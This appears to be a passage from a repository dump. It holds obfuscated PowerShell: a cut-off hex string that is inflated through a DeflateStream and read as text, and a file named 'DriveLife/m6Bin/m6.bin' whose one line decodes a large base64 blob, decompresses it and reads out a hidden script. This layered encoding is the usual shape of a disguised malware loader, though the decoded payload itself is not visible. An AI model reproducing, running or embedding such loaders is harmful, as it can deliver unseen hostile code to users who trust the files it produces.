7eedffff4fb75beccdba678be9abe1937ad36cedfea2fd3eaf5b8cd5f8c17d4e6faf5f73e736fef7c4603caeb476536a9ca0bfdf0ced6eff9593e9f66d332cb67abc27dc914628a0c0ce93333780cc3f4c1b3f40953bdb6a8795d5a6206bfa429bda17f7f7fef7bf9b228d1f6b34f52466da5800afaf017dff9fe9efc49afbcb44d9b6591b5c4176db5dcd697d05a296e1eee80bbea7c6630e87c3e2b5675bd9ea283eb7755bd5a34009a7a285e348bd9326fcc4b11d891f174499deaf882fe1d041e49ba3ad356cb6cd2edccfdd6c19a705b35ebd74d934fab3a841fbef38befeca43991ce1b668776a6a54e987914293b7ffa77a795799d998afed94b3f0b283af05849f1c424fd4539095e5b572ba60abfde302c928b826013c82d83bb371f9df1e64d99a7bf6480f068b11ba0a80dbb983250817c4d3fa4518075882e83e18682b8c57bd1181e17dcbbdcc828ed38943c89e8a024b3c07aac6d8c9a6cd355dbcec10e621a78d06d53cdb7f3b6a8afa220a4d52fbe43a8dc216a65e7bdd128f1011a3427f0197422b5a577bce6f457f0867921229d8238348a4f314b2efc41e64df432e3af1fd9817646d3e3586d87cff3f5b280cee87de95e35a2a732a7df47a45c650e88abd8495b28a94000636ae617dff19484d164dba6375219f4525f6bc4749bfbd30a647f94a6bd25c52fbe7387a4bfdc4e89e886dee84031c018ea8a2652a8813fcf26868b5ed244b2d2d5bfb9e17eda12b4797bb1cccbb128e294bff054938e535fa3e136f4e5ca35752431b3426fe8af4a204fcf6f9deb573d9a7c7f9710de763a38753844e6f18e13e3f3a7c523faff565b948628cdd8d7e6a9f2e868158aa1e52299db3bbbdbac5ae11d3c22e8f463ebfccb77f96c59001cb7e64e15b091a33b5bc4446d9b5f8c21b3c4ef244c68fc313b66c0ddb57068e9db8a03fa7c7afaedd767cf9fd88161fe8edfbc3e051e86d9c6505560288bbba548d7401b7e0a5bfa2f0ad53d927f62e7d61149a993b27a019a079f7e4abfdedb0fd0fafeae85c24c815eaed9bf7df8e9a7f78412e8d67b4b3f095e16a2c8d0194b74f8f98bb317a76f8834418f1f8b4fb6953ae9b25e030ddd70194b14610fb7b25c2f8daeb3fd75defefdf53dfaee17a7bf474a2ef81d62ad54d98bf88a4dc567694ee0d888951eb194504bea7235e586cb2215244900f2ba3a37ad447b36cbaa68a739daa77065adaeb4ba9e35564e6d5a3226c43fd4b39d21c55464c3328028432307e45b5abdb86407d9e289f97472094c5785b6df02b60a0248cbaf98137d1934d9db1fefeded621aeeedec8d1fdedfa5cf46f4ff7bfbfb8f1e1eec8ef7efed8d1fecee8eef1fd087d4ca7cb7bf37debdaf9ee1cbf1c1a7e3837bbbfa97076197de7ef8707c707ffce98300324122d8fa9e7c411f09e487bbe3bdf11e7d13bcb2471fef10a67b078ceddece9ef7257ff1e9f8c1dedef8fea7e6ad9d03c112adbb181abed276064f6aeaa34adfec3c1c7f4a3dd2eb8e9d19650f82f9959a3f78307eb8cf837b406fed3024e3f15bb505dabf3c7993ae2aa80ee3b6533c457144fa1938c1e33dc3153fa6cd5827bccbc7f5c5e26de3b467f686f47ff632370116707db69d2ef3d90c849d93bdb9363dbdbeaa48197e974c8098490de67e4c18aaf4e46bd1b6afa0b64955f1b7561d9d5c972d199be2750a11fd58a23e1203ed617a5c57757dba9dd6175fbc6d08b77c91bdf0facb3f271160e00cd6f885fc473ea5b8c7b55d55ed6b0870daef1962673a5a0065f40225e5ab5e8564e4803bd7a1a677e00a7e2172a30d0890fee6c9bb17ab36b920b61251b7fad193f81ffbd88572f476b9a2bfdf798ee0085fd037f403bf62181476beadabefe2938fd962edf2f466adb4a1cfd6dfba28deb9eef8c5e28a707bfe13afdddffa1b740229a43a9f93dd908fb2bab83cd6df610b15d4d97c5a67b981506010d3cb46ff7cf0f0c143fdf5d3879fda5f3fd5771ff63e3938d04f763ebd77fd5dfd903f38fdbd4fc7cda2cedfb821d617b98c10a3439b8b6571912dce14c4aabe50004559669feba7d486626ae0eb113307da4b1e6aca636dc9bc2cbf926ee813fa85ded41788890400375dfda27c5afe220f9e7c9ad517901aeaf8c49b621eebc1efbfffe9effdfb53a6ebd5cbdffbf4b97efb131660b3c8d6d3bc913ef9933c6faa45539a0697f5ecdd85f963b65a6797d94f5bc4ebcc0e62dad48dfd239f16979458c09f0113497b664f69d76604d2bcf5ad9a263a3fcf9f3622f0fc392924fa1cedbed28f45f54aa70a3d7ffdfaec4c321ad70a8c3fd0af91e930fde23bd05fbf6a987b3eb69e82a035cbf28b9521f176d5ae33c5513f020b9846dadfee62915d3b26e2cf96d4ae9ad43429862e6df639cbb0f489cf006ac6219efb0cc2532fde5d0b0f7dcb44975ffcde064e75be2c9a057fafdf110fef7df7a9bed196ebec599d7f57ff24a5e6fe38e1a9ff2c1534943eaad7a0b6f12fa9d4171ad3b26afa4e7ab4973ebb9b423542fbbc787397d23c86f665fe94fe7c07211e376f1bfa99bd994f8d7eb64e197c17d27706867e4a0e807e62b497b35ba2c7442ca0ca207e1d8fc50cc0735c40e6ba3a6940fca727a73a6cf9c81048f8f375aa1c95c2ddc0670a8e5837159673e41de96f3d583473d4d3ec78fbcdf12b4a793d371fd7d5227fba6a8a6f9b49a168e0ba5995d33a377aaf5d136bad9667795b4eb237fa2185c76437f2595e9f984fea1cd84eec1c2eb3e96b8380c5aaa91de5f24b88483d333836f3b6aada7c5d3ed10f4869be38be527886678be60551f57cda307f32e7e4b3e292acda6a5dd59fe78b0a6321c80c927e5e14e73070f23aa93ae205a3b6aacaa8404cef65f6ea3a5081f3262b9ff9c4a57675754506b13e27afc2d027c466b6985e930f11bc957d413efaef630cc2deeb174ff557ff737d03a2f6fa85a1c9beceb0fc750f7f693bfbe15ed064d7ff8b3580ffeddb693e3f49af8913d72efb9c5e54cf111a59d5c4945319a1ef9ca25390a4b584df95caf7eafc3a2b5f0ab91429f711ba11d545ff9aef77c3573ca2bb2fd03c9f5433b1b0acfbef053ad612405fd7efa0cff8eb600e9430ded741b7f4a940bdfafd038ac91fbf7fd8e3755d5786508b8be5352b3ccbe390346b8c9a76ba9ec1b3b1e20bb9e5c6acb56c67a90c1e020825f50a33422fb3e6758e16799cd3acfed220a71a426c081319c285699cac5f93f62cab6a65ad283a243bbf205df8266dcfaba642f27eca9ceb0c9d76f5554a36f43bdc1d5efbd2b4b19fe25dfbe9dbca51933fb89735d716ee9ef707c6b3eb7fa9bff31499195b483bc4924e1907caffb27ecdbe694b83d1979ea6f0e04f5ed35b621ae063ff98df9abdde6e236931cb49b935c5d3f433588c8fc5f586039feabb8116190022df62067e315655b217fa2e990ffc465f68fc58571aed2a3ce7072b7f94265b4366c48523d6a0b0432c6644db91bc1a26a99eac8af244e485a97f6f55e6b326fbb62731fc51461f52abeee7df5e3610fd861efdc2cad1abe727299665b4b9687cd2bc75be5aab3c60de7e9017c673a9ad9609de499d862b33f6d57fca9756c6fd275f93c779f64efd6b334e6efc8382566d56d5ef5f97c6136fe07db5cdefdfe6cb5593990fa797af79405d61ffe2cb938fad33357e71327efde5d3a7e3ef7ed7d041e5eac54f22a258bd33e6594d9cbe2796ce836ac30bc707fa1ede5a1d170b6352e903ef6f1eed179f3f379184f65e9cdb7979fefae92b43401a53be3212f3fae4f4f54be3dc37d76f6a8e11f8af77efde5d9fb7bfb7fe9579bf2bcade270413ded84f12a13e66c52e33d5acb3f2057de7867f912db32f8c4362d025ad416ff594e4ce788f0c38b9edea0312817a9f1070ce1499775ebf339d2992bf88ad419a1533c3485f7088babaaea7cbd75e40707cf6f4ec275f70c32fd24bc4b0bf68d17cd19ab75e38f68262e5f141cd5ed078dad5e97405d3af2a988302ab0416593790d9ffd431150b87b6b4f2a38d2d258ad59572b9f119f222eb7ca2ef94e5c2fb82bb2bcbaaf711fdbd58f0276658fad37c9ff11b841824fc8547270bcad2833f9dadab8b35db346ef5e2f5f2e572b6c000fcd86871f1943d406ed35ed00a4ea37f99ee494398ef256cb2f6ca909dbd0c7d0d6f8920123805417fb369825df2bf176bca4e898bfbae3bf6cc3366187ca330ab6fbffe493b3692bdd9eabb347d0806f0a158196d6abdebd7c6e4fce29497d87f2f498dd03bcbf5333644f86767ccffe99a506ef98dd4ebc748b692f35cbbb4a2a4f94dc691e12dd7e716d8caa6bc77d36767a90f5b3fa755995966a0ea670a5cfff2fbb0e14b45b874fad2af7ec92f9e4fdb6c6ad3a377ca1aae90eb507e42976d719ae0f52cabcae555f5747c87fc7f3234a406b1549f5222f6a7275f9aa5acabfcc5969f524507165f2f065a644b246cdd44ffc219f4c10a99a75fe82daefe421e167db9c6aad12f9c66dcc0509ba0fcfeab8599eca9c3fe178241bc95fb5f4834d7efa0cce993df6359353f3d7e4b5909ca1dc937778506bf3f8d7206dc9845e8334d1cfac3d091807fc8ab263348c690b2f464325c0a52e842e42973c9b951927ae1cf68d1cde13155f47bedd4efed17a7b2eeeb7f464876692344a1818020514a2809a88950a15ae5f5ef5fbec5f87f7ff0398d1fbca098f429a18f2188f038a542cc32162d0e20df291c192e269c7e71fce2d5e99baf5e92297e74b9cc0191fac2d8f565c69e51f7df7b7af6d557c479ec53bf9480852cbfd19ecc39d5c9efbf778fc49b26e063e339610e2ab2b744e08b2d5e3e635a85f87307bbe462d5c5b995447f162b99c5866611b623656d94d72492d3ec8bf19d5f920b0a68aeebe63f417cc0ae25ada516e3dfbfc5ca494e19c42b6604d6c4f55a5c4b1ac62aa35847ba439c49526546c23c542cbebb6df3199f6318d34cff5c74c8f48b69b6e5f78f9136fdc5f4ef1d61bbef8c3ca99245bfad8b6661a2ca258daea7971a914976656b56acb9556ae92f99159abc95f1a97f4be3fb25f0819735939cd795e82f6ec3cb60c44cdf2237da643981dab7c06039c922965d61b804a4b79a639776b7b1ecf42d957f682772c897c564fce9e25b5893b2405658d66020fcb6bea68d2fd0daf16afed675645fe731a96ec3cc7d9706a6d20ac8323f6296ca936d7fa6f2cf3ffb040b523a35ac5db7b487dff3b3c6503c6cf0e96847f46c335937e33b77ee0453fc89f0ad7ef29d4f54c6594ab61a4a763da15ec707cfde7cf5e8d1f72fd8b39a5553e38f9c8edb77f99bb118e0ef6da5f7670b9308d982ec61360c233951a06fce8d564fd9fe5949c0ef0d080b6686ab8cfeac3074440014b252706d0565501eb44b150b4f1e303b81481859a02f7cf445554081b1b6009338858118db680aed496146d4c4c7b2c43ea4b74461fbdaca583ca39a9f3fffea05fe0ffe36b34182245214bc207f6813f399a1be6b8b0eb9efa580095bf82f7d6c97407ff19ddf9f665c88cf8d2193f824d4cea60b5acf3684d19fbc02a21d931f08f1a85bb60ac27b6569b417cc4696bf2226a435a567e32fcfc06de6bbc5c5678a480f598368e3c6573071f1bb1f397b48921341e24ce67b4ee6ecaa5a0d6036c3aaedc79a79ec604628d124d20f45c32c119a5ef4e35f6215982a39675fa0ee080dfa1bfac620a3ef55ab349fadcb299c828f35ec240d4e587f8bd7caf1ddf24c3422614f9fc800f475b1bbc59417b82d611cdd04a461b59df1ee4f1210470f0dcae8b3bd7bccff02f5fa357de2be7b04b7fd3343387ff0819bc12bfaca73dec3ed080f5efb7e87d559f115ab374caecf3e299568dab91a883b70afb628d5f76d9bc15b9314e9ef27e33b5b1443508699668b80df7ffac5f87a8e55a40ae1dfc958d398afbfd745e5170b609e5763ccc2efb78c650abed7ef66392982960c9affbd35861e09649915835694c3b1831b78f8f22d339f21844f017d99096108c4840828c0c3d7af432a389e2a8c0b0b51056574f5b94f0e3b1c1ab66aaa8fe12984736b985f7ae0f80b964f3b59a5d74bd73785258d93b075b64aab96f8f582e4ccc45405a541b11e09aba3ea7f3dc967697e09dd3d4fdb6a9956b3745dfd3ee9a3575fbe7a85bc8b97f10aa6905d60fdc3aadaae4bfcbbceb056b76ad69a71a53150c2ee1ca398d2674d7695925b84097df4942640dd701257b8cdd90bfc8e2ff3f91b6fcdac8f500f29f341cf47b7bda137440da68b0e9a443af61abf8a13420d92dff51dea3b3b0728a8750587693720ad86c7cbac3b79e45beacce49433d19653a3c62f68769e12ebeddd2bb1eefd7b7d0f26d1421668dad4574532130e47fc1db57a1dbd6ff96b9536c51c6c0d169ae5242e6d9b51147e71c1ec92a5d7a4cdeb32a366ec3dbcf1c9633aeacf0e0256725278582c11e8210c4b5c13fa6ec2313c35fcfe795e7f6f74272f29b4fbf6f88ef5dce45b3388d95910c76d6d6d293045fc29e9146361f257bc12c3b4d58f1c89f503acbb89dfea2158d5f94fd15b6690edcb76798677bca13ded28709f0e9ea3f08bef90282c99bd97dba94f1321897d555ff925ecb0b33817da51fedaf3d87b8e32bb74d47675372d1659453ede67dc8d531933c5d4c3d28a72441121377791b7700988598b86ec6a966269d2cc3925819e16cb59c12a6483ee48efec80aa39612d32a05ca0bd5022fe463925c6244dd6aec8a2b6c731e5f05d8fd4818e9281750626dd9d57e9d3b3749951e4515c5965444ab1311c27ec6e9582eb567f6baa6f6bef783ef67c3f33d91a889901a9e38736ecdddcc969a9b885fb5d124b95c56bb118c7b5d5faf5a952ad9bb880c3ec206b6b3bbfbf58d50d08487835ebd7fa6a609268fe7ec9e19da798ca65b185f51a4f3d4d8f99ebf095f3a2738a69d26981e43ffd2827eb55fa7d388565391b93de722e1ac40b6bf25b58615b9c95e5d3efb99e5c2f46f8a4337a5bfb1bee48df90fea2bd74f4c06495d2badc2485865babb703bb396acc3c3332f354c43ba6463ec60aa12ee66af780b8014b831ebdd9c3f0171b054fd3094b5c4e7d1086c95687ba3cf59ab25c248667e39c52d0cbf52b89285f43209af56199ad8a2979402fad7f36560841b3867a68aae5050c6df154418061e56bbf2d027a3049b12cce69f8abeb37c4c2f8d728e2d9b17567ac156431c3600d035a01a4c0d44cb22a70268a4d405bad2386523f157fe2776d387b92da65ad6581a50c157b03b640b019aa9c3bbbdbac67311788a15735326e9886f32fdf9193528c05db5024334aa17ba2d4daf407eb224ede0049d2bacb6535fdfdcba68129c88d0b6f24ea977cff1a0bb7f9dbbbefea6bbbe2f44e619d37e6e3efae7f1130cfee22336e3e2ade56a56b705599a8c67db6e37e25a7655dcdee2eedb25cf903fcf1b1ac45ca8bd776b1e30757b569ca2daad6fe4d7f64efdc1fe76536bf6b64de7cd836d9b96be2bdba27bf6a737cb22b9f7cef11005f94668170d7b0e6bdddf1fdbb17c5ab2fb022f6c8214aa277c18da13ef563c0203959298c77fc86ed8ddcdbaa747ffe626ebdc86a690fdbf7ddb56983ef66d59c96301416ccd2782f44616a5965b4cb2f14f4cf2ff6424f928ecf52882d33cb7754edabc74332deda3c1f33afe1a03a27de6d44b28288c013216d6b2cf19018b52ea710b56ebfebef6aa48693379ec484a65981b0b8e8ef566abcd08229021bd2919f8ef028049621fdfd15cb90597000beb26e6304e8ca04a8754f8e6c3264bd7cb57888117c626044458c182314acccfd51bcad4291eaca92a1fbb0480923e16f4f886e96a08e58b4acee370a9127b58110e9c7be2c758448a4c7cc025a41887ce99141a80099311be1e848cef526b1519931c24270bbf2427344426224242e1ecca41bc44231f40d0c73fac7089ca995e10727206dd8d0756cad8147dc976fde7cfb7a80a10d6867142c277758586c80b6f75998b1bc16f635aa8c7edd1d4bcfe9ddf4cde9e7d7bcc273039d9a55dbce95440c8875912116fd11b1c451fd61c41276d899616eebd1b26f4077ef4217387269e3b81a3083317d45a976954524dece0d938c69a59f8164848247b5cf2ccd2ce631d259ca81b90882bf206b251393d0215a679596960736ea5c4aa0d6ce6f404c276b0a589e366af4627c7676f21aa1fec7928a912503ac17c84201c24aabe25dc02f3d7c9fe6e3722ab41e8f77bed708e990a1e45f3e0ea256c1e73b5be45fe7d3fcd5f8edb46aa4b9c270cda5fd0e3dbbe908a935fa8a52b813b34e437fda74dbd6563e5d929bba3cb359b2ebacae8fbfe7f0909618b305af2fd3dafd8efeba731f93bfaec89f7dd345d1c30aea6b9b9a71606b44f70e12cc130c6ecb5b43ebbfcedfb1a0d0f0682a7e7f0a841a617c5db9d1b76901872706d36100da590131dec8f0a4571f3f598f1ff38fa99037328a0e47c26fe0f756d3376362107ae335afe7bf999e629de7bba72f24bdc0300d4b75d6240037756b8ee07b3b44ea497aa49e4ca722760a42a40fd240fa84feeda427552897bc26bf41262855da54e5d488288fa437f62dd2eecf2979f46a5ce7c82109959cdcbb86f3665d9e532b7828aa9fba6376b2e44fa9d014fd70206e4074266181ce5f93b27672bcc528bd926f6865426222fdf2b52e4e6d5f214c58423473c36f3a0e1f7d031e2d3ee67c4bd811305b646e004197afadae345d4a7fad4d2f5b8a785d62dd9f92dfc24ccd3149244578c6d0e4f3767d3cf6078df75cff060a89bd278b3c519d97fc39e07eef7cffed349b946576c2cb87b3a2cc7e923b3f2f5a1ba69d206826603624250eff1ee57fb753ac53be21d0bfd8106794c37f10db35bab325dd6359d50aa832967e5536af25070f4d65811b4a6a42ec2a8714f586e20fdf0aa776c356cac84b5742b58dc3e985eb493f62b1555c217a66b2f46b96524f62f56358216b8802d1f858bc9c98641bc60aa45b5c1176a3f46b956be34fc13dc237c29fd651904515fdf7c70c62a054cfa7f8b11fd3f58defef7eeffb3f4d9f7faf599da9e2479e4bfbbdf3fd9dded794c99d50d67359958233390c06d8279fa0ed216536aae9d8bdd152b690bfd8f90c3fb66801c743f50ea07ceb60b407e1a7553797a3a535b5c5f7d26fa5df478bed7bdfabc9a12d5a4a2a535ae97b695df96820436a7e37e86c6fdb9c143538dc49cd045f6ca7687778efb3c2e0e3cdadb16d062418145019599a62bb96844c5051ae9ab1c18010d4af56fad3be68082a509edf7fb8f7403ffaf4e1fec3bdfd74c49f515ff2f7d6ef29a318dd79fee98307f7760eeeefecdf4be1f73fdfd9df79d06b84cfeeefdda7eff7ee513b34a2df23ede8d383870f76771eeced693bc5c3b4d53fbd570e1ededfdbdbb5edfb40f71eecdfdf43d77e23fabbdb6e67efbe59cbbe27bc8b5ff7f0ea3d7a917ed0bb9f1272dd170ff63f352f3e7cb87bff602f8d35d41620d9eefec1a73bf78414fb7b7b40e6de4117e8de03a2f8a707026defc1c1eec37b5da23ebcbffb70f7e05372a89eef3da4d60f0cb5d09080725bcb3b20c5bdfd4f771eecdcdb65a0073b3bf4fa0306aaad2c2d3edd25700f1874d0ce36b05f60ca3adfed1fecdebbffe91ee6789f09ae7fbb4686e168faee7dfa90f8e7c13dd350bfb2ed2dfebf71b2f57bc2433292eba32c9c2bf227cbb4dfc3d2f21d8dd53ebbae2b3221cbec0bd848a79f61d017462a487ebf67b4e616e25301fd8bd3976793f5cb6ee8a85e8ae8d56551fd34c1dafefe7df8ccb4204b368a95f367f44e63e0e7972dec51dd3200fc43867541ca48f4f2c77022e99fd94f5f1d3c588ff11be2a1bb8f105c1837f9a9fe446ea8acd7bfff9256fabb8adcfbfc7725fd778db58e2df8b51c507dffdeeef79e1665793a7ffde2e9f34fbe8fbf9e3f0725e60d7d906e8d3fdefa281da51f8f3f1e7d8c41149f7f9bfe6ddf2035f3fcf4bcfd38bdf333e75fbecab3e97cfbcbc9774e4fdea4bf38fddd7efff14f66cfd7f92f49efdc497f664c1d7eeff59b5767cb8befff6e97a7f5932f9b7c559f9e9fbeca9727a777beb73bbaf7fd4f3e7ef7f1f677be3c7bf1f1c7777ee3e4ff01'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd(); 2 | -------------------------------------------------------------------------------- /DriveLife/m6Bin/m6.bin: -------------------------------------------------------------------------------- 1 | $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::"FromBase64String"('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